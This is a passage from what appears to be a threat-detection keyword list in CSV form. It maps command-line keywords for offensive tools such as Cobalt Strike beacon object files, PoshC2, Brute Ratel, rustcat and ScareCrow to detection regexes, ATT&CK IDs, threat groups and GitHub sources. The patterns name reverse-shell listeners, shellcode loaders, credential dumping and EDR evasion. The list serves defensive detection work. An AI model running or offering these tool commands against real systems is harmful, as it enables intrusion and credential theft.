- T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "python3 start_campaign.py","python3\sstart_campaign\.py","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "rcat listen *","rcat\slisten\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "RedGuard -*","RedGuard\s\-.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "remotereg *","remotereg\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "rev2self*","rev2self.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "runof *.o*","runof\s.{0,1000}\.o.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "runpe *.exe*","runpe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "samdump *","samdump\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "ScareCrow -*","ScareCrow\s\-.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "scrun.exe *","scrun\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","0","N/A","10","10","178","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "set shellcode *","set\sshellcode\s.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "set_child *.exe","set_child\s.{0,1000}\.exe","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "sh_executor *","sh_executor\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "sharescan *.txt","sharescan\s.{0,1000}\.txt","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "shell.exe -u http://*","shell\.exe\s\-u\shttp\:\/\/.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "ShellCmd *","ShellCmd\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "show shellcodes","show\sshellcodes","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "SigFlip *","SigFlip\s.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "SigFlip *.exe*","SigFlip\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "sleeper force","sleeper\sforce","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "sleeper off","sleeper\soff","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "sleeper on","sleeper\son","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "sniffer -*","sniffer\s\-.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","0","N/A","N/A","8","709","63","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z" "spawn *.exe *.bin*","spawn\s.{0,1000}\.exe\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","420","69","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "SprayAD * * ","SprayAD\s.{0,1000}\s.{0,1000}\s","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "sudomy -*","sudomy\s\-.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1853","366","2024-02-19T14:38:48Z","2019-07-26T10:26:34Z" "SwampThing.csproj","SwampThing\.csproj","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "TokenStrip *","TokenStrip\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","32","6","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" "token-vault create*","token\-vault\screate.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "token-vault remove*","token\-vault\sremove.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "token-vault set *","token\-vault\sset\s.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "token-vault show*","token\-vault\sshow.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 